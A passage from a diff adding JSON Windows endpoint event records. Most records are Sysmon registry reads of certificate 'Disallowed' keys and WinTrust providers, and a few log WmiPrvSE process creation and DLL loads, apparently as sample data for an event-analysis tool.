"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wmiutils.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wmiutils.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573488550000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573488550000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573488550000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573488550000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573488550000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "command_line": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding", + "event_type": "process", + "logon_id": 997, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 4036, + "ppid": 780, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "subtype": "create", + "timestamp": 131883573488670000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}", + "unique_ppid": "{42FC7E13-B293-5C05-0000-0010FAC80000}", + "user": "NT AUTHORITY\\LOCAL SERVICE", + "user_domain": "NT AUTHORITY", + "user_name": "LOCAL SERVICE" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488700016, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573488700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573488700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573488700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488700016, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 